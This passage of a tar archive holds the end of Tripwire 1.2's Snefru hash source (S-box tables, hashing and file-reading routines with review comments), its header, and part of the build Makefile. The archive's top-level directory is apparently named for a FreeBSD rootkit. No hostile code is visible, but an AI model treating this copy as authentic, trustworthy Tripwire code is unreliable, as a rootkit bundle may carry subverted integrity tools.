0xf02e9efaL,0xb17b0674L,0xb072b1d3L,0x06e5723bL,0x3737e436L, /* 110*/ 0x24aa49c7L,0x0ded0d18L,0xdb256b14L,0x58b27877L,0xecb49f54L, /* 115*/ 0x6c40256aL,0x6ea92ffbL,0x3906aa4cL,0xc9866fd5L,0x4549323eL, /* 120*/ 0xa7b85fabL,0x1918cc27L,0x7308d7b5L,0x1e16c7adL,0x71850b37L, /* 125*/ 0x3095fd78L,0xa63b70e6L,0xd880e2aeL,0x3e282769L,0xa39ba6bcL, /* 130*/ 0x98700fa3L,0xf34c53e8L,0x288af426L,0xb99d930fL,0xf5b99df1L, /* 135*/ 0xe9d0c8cfL,0x5ac8405dL,0x50e7217bL,0x511fbbbeL,0x2ca2e639L, /* 140*/ 0xc020301bL,0x356dbc00L,0x8e43ddb9L,0x4d327b4aL,0xf20ff3edL, /* 145*/ 0x1dbb29bdL,0x43d44779L,0xa1b68f70L,0x6114455bL,0xe63d280bL, /* 150*/ 0x6bf6ff65L,0x10fc39e5L,0x3dae126eL,0xc1d7cf11L,0xcb60b795L, /* 155*/ 0x1789d5b3L,0x9bca36b7L,0x08306075L,0x84615608L,0x8b3a0186L, /* 160*/ 0xe88fbecdL,0x7ba47c4dL,0x2de44dacL,0x653fe58dL,0xcca0b968L, /* 165*/ 0xd7fa0e72L,0x93901780L,0x1f2c26ccL,0xae595b6bL,0xa9ecea9bL, /* 170*/ 0xe3dbf8c4L,0x319cc130L,0x12981196L,0x01a3a4deL,0x32c454b6L, /* 175*/ 0x755bd817L,0x3cd871e4L,0xa48bb8daL,0x02fdec09L,0xfd2dc2e2L, /* 180*/ 0x9e578088L,0x9a9f916dL,0x4065fe6cL,0x1853999eL,0xc7793f23L, /* 185*/ 0xdc1016bbL,0x969355ffL,0x7ef292f6L,0xcdce4adcL,0x05e24416L, /* 190*/ 0x85c16c46L,0xd441d37fL,0x57bd6855L,0x8746f54fL,0x9ca773dfL, /* 195*/ 0x770bae22L,0x54828413L,0xb75e4b19L,0x04c35c03L,0xbf7cca07L, /* 200*/ 0x2955c4ddL,0x721db041L,0xb2394f33L,0x03f51387L,0x89b73c9fL, /* 205*/ 0x0b1737f3L,0x07e69024L,0x9231d245L,0x76193861L,0x88159c15L, /* 210*/ 0xdeb552d9L,0xd9767e40L,0x20c6c0c3L,0x4281977cL,0xf8afe1e0L, /* 215*/ 0xd32a0751L,0x3fc27432L,0xddf1dcc5L,0x68581f34L,0x3bcd5025L, /* 220*/ 0x0091b2eeL,0x4aeb6944L,0x1602e743L,0xea09eb58L,0xef0a2a8bL, /* 225*/ 0x641e03a5L,0xeb50e021L,0x5c8ccef8L,0x802ff0b8L,0xd5e3edfeL, /* 230*/ 0xc4dd1b49L,0x5334cd2aL,0x13f82d2fL,0x47450c20L,0x55dafbd2L, /* 235*/ 0xbec0c6f4L,0xb45d7959L,0x3ad36e8cL,0x0aa8ac57L,0x1a3c8d73L, /* 240*/ 0xe45aafb1L,0x9f664838L,0xc6880053L,0xd0039bbfL,0xee5f19ebL, /* 245*/ 
0xca0041d8L,0xbbea3aafL,0xda628291L,0x9d5c95d4L,0xadd504a6L, /* 250*/ 0xc39ab482L,0x5e9e14a4L,0x2be065f0L,0x2a13fc3aL,0x9052e8ecL, /* 255*/ 0xaf6f5afcL /* End of S Box 14 */ }, { /* Start of S Box 15 */ /* 0*/ 0x519aa8b5L,0xbb303da9L,0xe00e2b10L,0xdfa6c1dbL,0x2e6b952eL, /* 5*/ 0xee10dc23L,0x37936d09L,0x1fc42e92L,0x39b25a9fL,0x13ff89f4L, /* 10*/ 0xc8f53feaL,0x18500bc7L,0x95a0379dL,0x98f751c2L,0x2289c42fL, /* 15*/ 0xa21e4098L,0x6f391f41L,0xf27e7e58L,0x0d0df887L,0x4b79d540L, /* 20*/ 0x8e8409aaL,0x71fe46f8L,0x688a9b29L,0x3f08b548L,0x84abe03aL, /* 25*/ 0x5e91b6c1L,0xfde4c2aeL,0x251d0e72L,0x92d4fee5L,0xf9371967L, /* 30*/ 0x9175108fL,0xe6e81835L,0x8c8cb8eeL,0xb55a67b3L,0xcef138ccL, /* 35*/ 0x8b256268L,0x00d815f5L,0xe8810812L,0x77826189L,0xea73267dL, /* 40*/ 0x19b90f8dL,0x45c33bb4L,0x82477056L,0xe1770075L,0x09467aa6L, /* 45*/ 0xa7c6f54aL,0x79768742L,0x61b86bcaL,0xd6644a44L,0xe33f0171L, /* 50*/ 0xc229fbcdL,0x41b08febL,0xd1903e30L,0x65ec9080L,0x563d6fbdL, /* 55*/ 0xf56da488L,0xebf64cd8L,0x4934426bL,0x7c8592fcL,0x6aca8cf2L, /* 60*/ 0x1cea111bL,0x3a57ee7aL,0xace11c0dL,0x9942d85eL,0xc4613407L, /* 65*/ 0xfa8e643bL,0x327fc701L,0x4ca9be82L,0x3352526dL,0x2c047f63L, /* 70*/ 0xf3a8f7ddL,0x1a4a98a8L,0x762ed4d1L,0x27c75008L,0xbdf497c0L, /* 75*/ 0x7a7b84dfL,0x315c28abL,0x801f93e3L,0xf19b0ca1L,0x8f14e46aL, /* 80*/ 0xe48ba333L,0x9605e625L,0xf03ecb60L,0x60385f2dL,0x902845baL, /* 85*/ 0x7f96d66fL,0x24bff05cL,0x2820730bL,0x947133cbL,0xd444828aL, /* 90*/ 0xb343f6f1L,0x0bef4705L,0x8da574f9L,0x01e25d6cL,0x1732793eL, /* 95*/ 0x4f0f7b27L,0x364b7117L,0xb2d1da77L,0xa6c5f1e9L,0x574ca5b1L, /* 100*/ 0x386a3076L,0xad6894d6L,0x1156d7faL,0xa48d1d9aL,0x4794c0afL, /* 105*/ 0x150c0aa0L,0x26d348acL,0x29fdeabeL,0xa5dede53L,0x81671e8eL, /* 110*/ 0x594ee3bfL,0xa96c56e6L,0x3426a726L,0xc5976579L,0xbc22e5e4L, /* 115*/ 0xc1006319L,0xdaafdd2aL,0xa1a1aa83L,0x3badd0e7L,0xc3b14981L, /* 120*/ 0xd770b155L,0xccd7c693L,0x42e944c5L,0x03e0064fL,0xca95b4efL, /* 125*/ 
0x3dee81c3L,0xfbbcd98cL,0x1e07e15bL,0x667ce949L,0xe7d6773fL, /* 130*/ 0x21b6124bL,0x6b2a6ef7L,0xd3278a9cL,0x9a988304L,0x75d2ae9bL, /* 135*/ 0xfe49e2ffL,0x9bc24f46L,0x74cc2cf6L,0xa3139f36L,0x6c9ef35aL, /* 140*/ 0x9fc1dffeL,0x9e5facdcL,0xaadc8bbbL,0x5abdbc5fL,0x44b3b390L, /* 145*/ 0xf754efa7L,0x5fe3bdb7L,0x4e59c886L,0x06a4c984L,0xa0338878L, /* 150*/ 0xcd513cd7L,0x63ebd27eL,0x8aba80adL,0x50da144eL,0x5d9f4e97L, /* 155*/ 0x025b751cL,0x2d580200L,0xb6c05837L,0x580aa15dL,0x54022a6eL, /* 160*/ 0xb41a5415L,0x4863fab6L,0xb0b79957L,0x46d0d159L,0xdc2b8650L, /* 165*/ 0x20a7bb0cL,0x4a032974L,0xec8636a2L,0x8548f24cL,0xf6a2bf16L, /* 170*/ 0x1088f4b0L,0x0c2f3a94L,0x525dc396L,0x14065785L,0x2b4dca52L, /* 175*/ 0x08aeed39L,0xabedfc99L,0xb1dbcf18L,0x87f85bbcL,0xae3aff61L, /* 180*/ 0x433ccd70L,0x5b23cc64L,0x7b453213L,0x5355c545L,0x9318ec0aL, /* 185*/ 0x78692d31L,0x0a21693dL,0xd5666814L,0x05fb59d9L,0xc71985b2L, /* 190*/ 0x2abb8e0eL,0xcf6e6c91L,0xd9cfe7c6L,0xefe7132cL,0x9711ab28L, /* 195*/ 0x3ce52732L,0x12d516d2L,0x7209a0d0L,0xd278d306L,0x70fa4b7bL, /* 200*/ 0x1d407dd3L,0xdb0beba4L,0xbfd97621L,0xa8be21e1L,0x1b6f1b66L, /* 205*/ 0x30650ddaL,0xba7ddbb9L,0x7df953fbL,0x9d1c3902L,0xedf0e8d5L, /* 210*/ 0xb8741ae0L,0x0f240565L,0x62cd438bL,0xc616a924L,0xaf7a96a3L, /* 215*/ 0x35365538L,0xe583af4dL,0x73415eb8L,0x23176a47L,0xfc9ccee8L, /* 220*/ 0x7efc9de2L,0x695e03cfL,0xf8ce66d4L,0x88b4781dL,0x67dd9c03L, /* 225*/ 0x3e8f9e73L,0xc0c95c51L,0xbe314d22L,0x55aa0795L,0xcb1bb011L, /* 230*/ 0xe980fdc8L,0x9c62b7ceL,0xde2d239eL,0x042cadf3L,0xffdf04deL, /* 235*/ 0x5ce6a60fL,0xd8c831edL,0xb7b5b9ecL,0xb9cbf962L,0xe253b254L, /* 240*/ 0x0735ba1fL,0x16ac917fL,0xdd607c2bL,0x64a335c4L,0x40159a7cL, /* 245*/ 0x869222f0L,0x6ef21769L,0x839d20a5L,0xd03b24c9L,0xf412601eL, /* 250*/ 0x6d72a243L,0x0e018dfdL,0x89f3721aL,0xc94f4134L,0x2f992f20L, /* 255*/ 0x4d87253cL /* End of S Box 15 */ } }; /* * The following routine is a simple error exit routine -- it prints a * message and aborts */ void ErrAbort (s) char *s; { fprintf 
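(stderr, "%s\n", s); exit (1); }

/*
 * ConvertChunkOfBytes packs 4*CHUNK_SIZE bytes into CHUNK_SIZE word32
 * values.  The first byte of each group of four lands in the most
 * significant position, so the result does not depend on the byte order
 * of the host.  Each byte is masked with 0xff after the assignment, which
 * removes sign extension on platforms where plain char is signed.
 *
 * The visible code never calls this routine: ReadChunk names it only in a
 * comment and converts with bs_ntohl instead.
 */
void
ConvertChunkOfBytes (charBuffer, wordBuffer)
    /* an input buffer of characters */
    char charBuffer[CHUNK_SIZE*4];
    /* an output buffer of word32's */
    word32 wordBuffer[CHUNK_SIZE];
{
    int i;
    word32 t0, t1, t2, t3;

    for (i = 0; i < CHUNK_SIZE; i++) {
        t0 = charBuffer[4*i];
        t1 = charBuffer[4*i + 1];
        t2 = charBuffer[4*i + 2];
        t3 = charBuffer[4*i + 3];
        t0 &= 0xffL;
        t1 &= 0xffL;
        t2 &= 0xffL;
        t3 &= 0xffL;
        wordBuffer[i] = (t0 << 24) | (t1 << 16) | (t2 << 8) | t3;
    };
}

/*
 * ReadChunk tries to read 4*CHUNK_SIZE bytes from fp into buf, stored as
 * CHUNK_SIZE word32 values.  A short read leaves the remaining bytes zero.
 *
 * Returns the number of bytes actually read (0 at end of file).  A stream
 * error aborts through ErrAbort.
 *
 * fread() returns an unsigned count and can never be negative, so the
 * earlier "byteCount < 0" test could not fire: a failing read looked like
 * end of file, and the digest of a partly read file was reported as if it
 * covered the whole file.  The error is now taken from ferror().
 */
int
ReadChunk (buf, fp)
    word32 buf[CHUNK_SIZE];
    FILE *fp;
{
    /*
     * The union gives the byte buffer the alignment of word32, so the
     * word-wise copy below never reads through a misaligned pointer.
     */
    union {
        char   bytes[CHUNK_SIZE*4];
        word32 words[CHUNK_SIZE];
    } chunk;
    size_t got;
    int byteCount;
    int i;

    got = fread(chunk.bytes, 1, CHUNK_SIZE*4, fp);
    if (got < (size_t) (CHUNK_SIZE*4) && ferror(fp))
        ErrAbort ("error on read");
    byteCount = (int) got;

    /* Zero out rest of buffer */
    for (i = byteCount; i < CHUNK_SIZE*4; i++)
        chunk.bytes[i] = 0;

    /*
     * The following conversion is required for machines with
     * byte-ordering unlike the SUN's (68000's or SPARC)
     * ConvertChunkOfBytes (charBuf, buf);
     *
     * bs_ntohl is defined outside this view; presumably it converts the
     * word in place to host order -- confirm against byteorder.h.
     */
    for (i = 0; i < CHUNK_SIZE; i++) {
        buf[i] = chunk.words[i];
        bs_ntohl(buf[i]);
    }

    return (byteCount);
}

/*
 * HashN is a conceptually simpler and more general version of Hash512.
 * It accepts an input of
 * INPUT_BLOCK_SIZE 32-bit words and produces an output of
 * OUTPUT_BLOCK_SIZE 32-bit words.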
The INPUT_BLOCK_SIZE must be at
 * least two words larger than the output, or a serious degradation
 * in security will occur.  In addition, the use of outputs less
 * than 128 bits will often significantly reduce security.  While
 * possible, it requires great caution.
 */
/*
 * Parameters:
 *   output - receives OUTPUT_BLOCK_SIZE words.
 *   input  - INPUT_BLOCK_SIZE words; it is copied into a local block first
 *            and is not modified through this pointer.
 *
 * output may be the same array as input: each output[i] is computed from
 * input[i] at the same index, after all mixing has been done on the copy.
 *
 * The visible code does not call HashN; sig_snefru_get uses Hash512.
 *
 * NOTE(review): MASK is defined outside this view; presumably it is
 * INPUT_BLOCK_SIZE-1 with INPUT_BLOCK_SIZE a power of two -- confirm.
 * NOTE(review): Snefru with a small number of passes has published
 * collision attacks.  SECURITY_LEVEL (the pass count) is set outside this
 * view -- confirm its value before relying on this digest alone to detect
 * tampering.
 */
void
HashN (output, input)
    word32 output[OUTPUT_BLOCK_SIZE];
    word32 input[INPUT_BLOCK_SIZE];
{
    /* right-rotation applied after each of the four byte positions */
    static int shiftTable[4] = {16, 8, 16, 24};
    /* the array of data being hashed */
    word32 block[INPUT_BLOCK_SIZE];
    word32 SBoxEntry;	/* just a temporary */
    int shift;
    int i;
    int index;
    int next, last;
    int byteInWord;

    /* initialize the block to be encrypted from the input */
    for (i = 0; i < INPUT_BLOCK_SIZE; i++)
        block[i] = input[i];

    /* one iteration of the outer loop per pass; each pass uses two S-boxes */
    for (index = 0; index < SECURITY_LEVEL; index++) {
        for (byteInWord = 0; byteInWord < 4; byteInWord++) {
            for (i = 0; i < INPUT_BLOCK_SIZE; i++) {
                /* compute i+1 and i-1 mod INPUT_BLOCK_SIZE */
                next = (i + 1) & MASK;
                last = (i + MASK) & MASK;

                /*
                 * Load an entry from the S-box.  The box alternates
                 * every two words ((i / 2) & 1); the entry is selected
                 * by the low byte of block[i].
                 */
                SBoxEntry = standardSBoxes
                    [2*index + ((i / 2) & 1)]
                    [block[i] & 0xffL];
                /*
                 * and XOR that entry with the preceding and
                 * following words
                 */
                block[next] ^= SBoxEntry;
                block[last] ^= SBoxEntry;
            };

            /*
             * Rotate right all 32-bit words in the entire block
             * at once.  The expression assumes word32 is exactly
             * 32 bits wide.
             */
            shift = shiftTable[byteInWord];
            for (i = 0; i < INPUT_BLOCK_SIZE; i++)
                block[i] = (block[i] >> shift) | (block[i] << (32 - shift));
        };	/* end of byteInWord going from 0 to 3 */
    };	/* end of index going from 0 to
         * SECURITY_LEVEL-1 */

    /* fold the mixed block, taken in reverse word order, into the input */
    for (i = 0; i < OUTPUT_BLOCK_SIZE; i++)
        output[i] = input[i] ^ block[MASK - i];
}

/*
 * Hash512 is a more efficient and specialized version of HashN.
 * It accepts an input of INPUT_BLOCK_SIZE 32-bit words and
 * produces an output of
 * OUTPUT_BLOCK_SIZE 32-bit words.  The INPUT_BLOCK_SIZE must be at
 * least two words larger than the output, or a serious degradation
 * in security will occur.  In addition, the use of outputs less
 * than 128 bits will often significantly reduce security.  While
 * possible, it requires great caution.
 *
 * The body reads input[0] through input[15] unconditionally, so it is
 * only correct when INPUT_BLOCK_SIZE is 16.  OUTPUT_BLOCK_SIZE must be
 * 4 or 8; any other value reaches ErrAbort after output[0..7] have
 * already been written.
 *
 * output may be the same array as input (sig_snefru_get calls it that
 * way): all sixteen input words are copied into locals before any
 * output word is stored.
 *
 * round() and rotate() are macros defined outside this view.  SBE, shift
 * and leftShift are not used directly below and are presumably referenced
 * by those macros -- confirm before renaming or removing them.
 */
void
Hash512 (output, input)
    word32 output[OUTPUT_BLOCK_SIZE];
    word32 input[INPUT_BLOCK_SIZE];
{
    /* right-rotation applied after each of the four byte positions */
    static int shiftTable[4] = {16, 8, 16, 24};
    word32 SBE;	/* just a temporary */
    int shift, leftShift;
    int index;
    int byteInWord;
    word32 *SBox0;
    word32 *SBox1;
    /* the sixteen words of data being hashed */
    word32 B00,B01,B02,B03,B04,B05,B06,B07,B08,B09,B10,B11,B12,B13,B14,B15;

    /* initialize the block to be encrypted from the input */
    B00 = input[0];
    B01 = input[1];
    B02 = input[2];
    B03 = input[3];
    B04 = input[4];
    B05 = input[5];
    B06 = input[6];
    B07 = input[7];
    B08 = input[8];
    B09 = input[9];
    B10 = input[10];
    B11 = input[11];
    B12 = input[12];
    B13 = input[13];
    B14 = input[14];
    B15 = input[15];

    for (index = 0; index < SECURITY_LEVEL; index++) {
        /* the two S-boxes used by this pass */
        SBox0 = standardSBoxes[2*index+0];
        SBox1 = standardSBoxes[2*index+1];
        for (byteInWord = 0; byteInWord < 4; byteInWord++) {
            /*
             * One round() per word, in word order; the S-box
             * alternates every two words, as in HashN.
             */
            round(B15,B00,B01,SBox0);
            round(B00,B01,B02,SBox0);
            round(B01,B02,B03,SBox1);
            round(B02,B03,B04,SBox1);
            round(B03,B04,B05,SBox0);
            round(B04,B05,B06,SBox0);
            round(B05,B06,B07,SBox1);
            round(B06,B07,B08,SBox1);
            round(B07,B08,B09,SBox0);
            round(B08,B09,B10,SBox0);
            round(B09,B10,B11,SBox1);
            round(B10,B11,B12,SBox1);
            round(B11,B12,B13,SBox0);
            round(B12,B13,B14,SBox0);
            round(B13,B14,B15,SBox1);
            round(B14,B15,B00,SBox1);

            /*
             * Rotate right all 32-bit words in the entire block
             * at once.
             */
            shift = shiftTable[byteInWord];
            leftShift = 32-shift;
            rotate(B00);
            rotate(B01);
            rotate(B02);
            rotate(B03);
            rotate(B04);
            rotate(B05);
            rotate(B06);
            rotate(B07);
            rotate(B08);
            rotate(B09);
            rotate(B10);
            rotate(B11);
            rotate(B12);
            rotate(B13);
            rotate(B14);
            rotate(B15);
        };	/* end of byteInWord going from 0 to 3 */
    };	/* end of index going from 0 to
         * SECURITY_LEVEL-1 */

    /* fold the mixed block, taken in reverse word order, into the input */
    output[0] = input[0] ^ B15;
    output[1] = input[1] ^ B14;
    output[2] = input[2] ^ B13;
    output[3] = input[3] ^ B12;
    if(OUTPUT_BLOCK_SIZE == 4) return;
    output[4] = input[4] ^ B11;
    output[5] = input[5] ^ B10;
    output[6] = input[6] ^ B09;
    output[7] = input[7] ^ B08;
    if(OUTPUT_BLOCK_SIZE == 8) return;
    ErrAbort("Bad value for OUTPUT_BLOCK_SIZE");
}

/*
 * This routine increments a 64-bit counter by the given increment.
 *
 * counter[0] holds the upper 32 bits and counter[1] the lower 32 bits.
 * The routine aborts through ErrAbort when the upper word is already
 * 0xffffffff and a carry is needed.
 *
 * NOTE(review): in the carry branch the low word is set to
 * increment - (maxInt - counter[1]), which is one greater than
 * (counter[1] + increment) modulo 2^32.  The code is left unchanged
 * because the branch is reached only when the low word wraps (the visible
 * caller counts bits, so after 2^32 bits of input) and a correction would
 * change the digests produced for such inputs.  Confirm against the
 * reference implementation before changing it.
 * NOTE(review): the comparison mixes word32 with a signed long and a
 * negative increment is not handled; the visible caller passes
 * 8*byteCount, which is never negative.
 */
void
Increment64BitCounter (counter, increment)
    word32 counter[2];
    long int increment;
{
    word32 maxInt = 0xffffffffL;

    if ( (maxInt-counter[1]) < increment) {
        /* Overflow from the lower 32 bits */
        if (counter[0] == maxInt)
            ErrAbort("64-bit counter overflowed");
        /* bump the upper 32 bits */
        counter[0]++;
        /* and then increment the lower 32 bits */
        /* without ever overflowing! */
        counter[1] = maxInt-counter[1];
        counter[1] = increment - counter[1];
    } else
        /* increment the total number of bits read */
        counter[1] += increment;
}

/*
 * The main program reads the input, hashes it, and prints the result.
 *
 * The basic idea is simple.  As an example, if H is the hash function that
 * produces 128-bit outputs, and if we pick an input string that is 3
 * "chunks" long then we are computing:
 *
 * output = H( H( H( H( 0 || chunk[0]) || chunk[1])
 * || chunk[2]) || bit-length)
 *
 * "bit-length" is a "chunk" sized field into which has been put the length of
 * the input, in bits, right justified.  Note that the size of a "chunk" is
 * just the input size minus the output size (typically 48 bytes or 12
 * words).
 *
 * "0" is a vector of 0 bits of the same size (in bits) as the output of H
 * (i.e., typically 128 bits).
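*
 * "||" is the concatenation operator, and is used to concatenate the output
 * field of the preceding computation of H with the next "chunk" of bits from
 * the input.
 *
 * "chunk" is an array which holds the input in words.  The final element of the
 * array is left justified and zero-filled on the right.
 *
 */

/*
 * sig_snefru_get computes the Snefru digest of the file open on fd_in and
 * stores its printable form in ps_signature: hexadecimal when the global
 * printhex is set, otherwise whatever pltob64() produces.  Both printhex
 * and pltob64 are defined outside this view.
 *
 * Parameters:
 *   fd_in        - descriptor of the file to hash.  It is duplicated, so
 *                  the caller's descriptor stays open, but the duplicate
 *                  shares its file offset: the rewind() below moves the
 *                  caller's position, which is then left at end of file.
 *   ps_signature - caller-supplied buffer that receives the
 *                  NUL-terminated signature.
 *   siglen       - never read by this routine.
 *
 * Returns 0.  Exits the process if the descriptor cannot be turned into a
 * stdio stream, and through ErrAbort on a read error or counter overflow.
 *
 * NOTE(review): siglen is presumably the capacity of ps_signature, yet
 * nothing here checks it.  The hex form needs 8*OUTPUT_BLOCK_SIZE + 1
 * bytes; the size needed by pltob64() cannot be told from here.  Confirm
 * that every caller supplies a large enough buffer, or enforce siglen.
 */
int
sig_snefru_get(fd_in, ps_signature, siglen)
    int fd_in;
    char *ps_signature;
    int siglen;
{
    int i;
    word32 hash[INPUT_BLOCK_SIZE];
    word32 bitCount[2];	/* the 64-bit count of the number of
                         * bits in the input */
    long int byteCount;	/* the count of the number of bytes we just
                         * read */
    FILE *fp;

    /* get stdio handle
     * we use dup() so we can close() it later
     *
     * A failed dup() returns -1, which makes fdopen() fail as well, so
     * the single test covers both calls.  The message now names this
     * routine; it used to say "sig_haval_get".
     */
    if (!(fp = (FILE *) fdopen(dup(fd_in), "rb"))) {
        perror("sig_snefru_get: fdopen()");
        exit(1);
    }

    ps_signature[0] = 0;

    /* rewind the file descriptor */
    rewind(fp);

#ifdef MAIN
    /* Test for various error conditions and logic problems */
    if (SECURITY_LEVEL*2 > MAX_SBOX_COUNT)
        ErrAbort ("Too few S-boxes for specified SECURITY_LEVEL");
    if (OUTPUT_BLOCK_SIZE < 4)
        ErrAbort ("OUTPUT_BLOCK_SIZE too small");
    if ((INPUT_BLOCK_SIZE & MASK) != 0)
        ErrAbort ("logic error, INPUT_BLOCK_SIZE not a power of 2");
    if ((INPUT_BLOCK_SIZE % 4) != 0)
        ErrAbort ("logic error, INPUT_BLOCK_SIZE not a multiple of 4");
    if (OUTPUT_BLOCK_SIZE > INPUT_BLOCK_SIZE - 2)
        ErrAbort ("logic error, OUTPUT_BLOCK_SIZE is too big");
    if (CHUNK_SIZE < 2)
        ErrAbort ("logic error, CHUNK_SIZE is too small");
#endif

    /*
     * The error conditions have now been checked -- everything should
     * work smoothly
     */

    bitCount[0] = 0;
    bitCount[1] = 0;
    for (i = 0; i < INPUT_BLOCK_SIZE; i++)
        hash[i] = 0;	/* initialize hash */

    /*
     * Hash each chunk in the input (either 48 byte chunks or 32 byte
     * chunks) -- and keep the result in hash.  Note that the first 16
     * (32) bytes of hash holds the output of the previous hash
     * computation done during the previous iteration of the loop
     */
    do {
        /* Get the next chunk */
        byteCount = ReadChunk (&hash[OUTPUT_BLOCK_SIZE], fp);
        Increment64BitCounter (bitCount, 8*byteCount);
        /* hash in the block we just read */
        if (byteCount > 0)
            Hash512 (hash, hash);
    } while (byteCount > 0);	/* end of while */

    /*
     * Put the 64-bit bit-count into the final 64-bits of the block about
     * to be hashed.  The last ReadChunk call returned 0 and so left the
     * chunk part of hash zero-filled.
     */
    hash[INPUT_BLOCK_SIZE - 2] = bitCount[0];	/* upper 32 bits of
                                                 * count */
    hash[INPUT_BLOCK_SIZE - 1] = bitCount[1];	/* lower 32 bits of
                                                 * count */
    /* Final hash down. */
    Hash512 (hash, hash);

    /*
     * the first OUTPUT_BLOCK_SIZE words of "hash" now hold the hashed
     * result, which is written to ps_signature
     */
    if (printhex) {
        /*
         * Eight hex digits per word, written at a fixed offset.  The
         * earlier "#if (TW_TYPE32 == int)" could not pick the format:
         * the preprocessor evaluates identifiers it does not know as 0,
         * so the "%08x" branch was always taken, whatever type word32
         * is.  Casting to unsigned long makes the argument match the
         * format for any word32, and the mask keeps the field at eight
         * digits.
         */
        for (i = 0; i < OUTPUT_BLOCK_SIZE; i++)
            sprintf (ps_signature + 8*i, "%08lx",
                     (unsigned long) (hash[i] & 0xffffffffL));
    }
    /* base 64 */
    else {
        pltob64(hash, ps_signature, OUTPUT_BLOCK_SIZE);
    }

    /*
        for (i = 0; i < OUTPUT_BLOCK_SIZE; i++)
            printf (" %08x", hash[i]);
     * Note that if the user wishes to view the output as a sequence
     * of bytes, then the byte order is the same as the order
     * in which the bytes are printed by "printf" above.  The
     * first byte (designated byte 0) is the left-most byte
     * printed by "printf" above.  The last byte (designated
     * byte 15) is the right-most byte printed.
     * This can also be viewed as:
     *
     * the first byte is the most significant byte of hash[0],
     * the second byte is the second most significant byte of hash[0],
     * the third byte is the third most significant byte of hash[0],
     * the fourth byte is the least significant byte of hash[0],
     * the fifth byte is the most significant byte of hash[1],
     * etc.  This process continues until the last byte is reached.
     * The last byte is the least significant byte of hash[3].
     *
     * This is basically "big-endian" or network byte order.
     *
     * Although the use of the full 128 bits of output is recommended,
     * in some applications it will be both useful and safe to use
     * a smaller output.  From a purely technical point of view, which
     * bytes are retained and which are discarded is not an issue
     * of any great significance.  If there is any issue of standardization
     * in the particular application, then the bytes that should be
     * retained are the left-most bytes printed out by "printf" above, and
     * the bytes that are to be discarded are the right-most bytes
     * printed out by "printf" above.  That is, the most significant
     * (left most, lower numbered) bytes are retained, while the
     * least significant (right most, higher numbered) bytes are discarded.
     *
     * When the output size is other than 128 bits, the above comments
     * should be extended in the obvious fashion.
        printf ("\n");
        exit (0);
     */

    /* closes only the duplicate descriptor made by dup() above */
    fclose(fp);
    return 0;
}
fbsdrootkit-1.2/tripwire-1.2/sigs/snefru/snefru.h100600 764 764 134 5452727656 17220 0ustar dfdfint sig_snefru_get(); /* $Id: snefru.h,v 1.10 1993/10/01 04:18:54 genek Exp $ */ /* xxx */ fbsdrootkit-1.2/tripwire-1.2/src/ 40700 764 764 0 6273465264 14004 5ustar dfdffbsdrootkit-1.2/tripwire-1.2/src/Makefile100600 764 764 20254 5614756406 15565 0ustar dfdf# $Id: Makefile,v 1.26 1994/07/25 15:40:54 gkim Exp $ # # Tripwire build # CFLAGS = -O OFILES = config.parse.o main.o list.o ignorevec.o dbase.build.o \ utils.o preen.o preen.interp.o preen.report.o \ nullsig.o config.prim.o dbase.update.o \ config.pre.o help.o \ $(OSIGS) SIGDIR = ../sigs SIG1DIR = $(SIGDIR)/md5 SIG2DIR = $(SIGDIR)/snefru SIG3DIR = $(SIGDIR)/crc32 SIG4DIR = $(SIGDIR)/crc SIG5DIR = $(SIGDIR)/md4 SIG6DIR = $(SIGDIR)/md2 SIG7DIR = $(SIGDIR)/sha SIG8DIR = $(SIGDIR)/haval SIGDIRS = $(SIG1DIR) $(SIG2DIR) $(SIG3DIR) $(SIG4DIR) $(SIG5DIR) \ $(SIG6DIR) $(SIG7DIR) $(SIG8DIR) $(SIG9DIR) OSIG1 = $(SIG1DIR)/md5wrapper.o $(SIG1DIR)/md5.o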
OSIG2 = $(SIG2DIR)/snefru.o OSIG3 = $(SIG3DIR)/crc32.o OSIG4 = $(SIG4DIR)/crc.o OSIG5 = $(SIG5DIR)/md4.o $(SIG5DIR)/md4wrapper.o OSIG6 = $(SIG6DIR)/md2.o $(SIG6DIR)/md2wrapper.o OSIG7 = $(SIG7DIR)/sha.o $(SIG7DIR)/shawrapper.o OSIG8 = $(SIG8DIR)/haval.o $(SIG8DIR)/havalwrapper.o OSIGS = $(OSIG1) $(OSIG2) $(OSIG3) $(OSIG4) $(OSIG5) $(OSIG6) $(OSIG7) \ $(OSIG8) $(OSIG9) CSIG1 = $(SIG1DIR)/md5wrapper.c $(SIG1DIR)/md5.c CSIG2 = $(SIG2DIR)/snefru.c CSIG3 = $(SIG3DIR)/crc32.c CSIG4 = $(SIG4DIR)/crc.c CSIG5 = $(SIG5DIR)/md4.c $(SIG5DIR)/md4wrapper.c CSIG6 = $(SIG6DIR)/md2.c $(SIG6DIR)/md2wrapper.c CSIG7 = $(SIG7DIR)/sha.c $(SIG7DIR)/shawrapper.c CSIG8 = $(SIG8DIR)/haval.c $(SIG8DIR)/havalwrapper.c CSIGS = $(CSIG1) $(CSIG2) $(CSIG3) $(CSIG4) $(CSIG5) $(CSIG6) $(CSIG7) \ $(CSIG8) $(CSIG9) CFILES = config.parse.c main.c list.c ignorevec.c dbase.build.c \ utils.c preen.c preen.interp.c preen.report.c \ nullsig.c config.prim.c dbase.update.c \ config.pre.c help.c \ $(CSIGS) ### all: tripwire siggen tripwire: $(P) help.c $(OFILES) $(CC) $(CFLAGS) $(LDFLAGS) -o $@ $(OFILES) $(LIBS) $(OSIG1): ../include/byteorder.h (cd $(SIG1DIR); make CC="$(CC)" CFLAGS="$(CFLAGS) -I. -I..") $(OSIG2): ../include/byteorder.h (cd $(SIG2DIR); make CC="$(CC)" CFLAGS="$(CFLAGS) -I. -I..") $(OSIG3): ../include/byteorder.h (cd $(SIG3DIR); make CC="$(CC)" CFLAGS="$(CFLAGS) -I. -I..") $(OSIG4): ../include/byteorder.h (cd $(SIG4DIR); make CC="$(CC)" CFLAGS="$(CFLAGS) -I. -I..") $(OSIG5): ../include/byteorder.h (cd $(SIG5DIR); make CC="$(CC)" CFLAGS="$(CFLAGS) -I. -I..") $(OSIG6): ../include/byteorder.h (cd $(SIG6DIR); make CC="$(CC)" CFLAGS="$(CFLAGS) -I. -I..") $(OSIG7): ../include/byteorder.h (cd $(SIG7DIR); make CC="$(CC)" CFLAGS="$(CFLAGS) -I. -I..") $(OSIG8): ../include/byteorder.h (cd $(SIG8DIR); make CC="$(CC)" CFLAGS="$(CFLAGS) -I. 
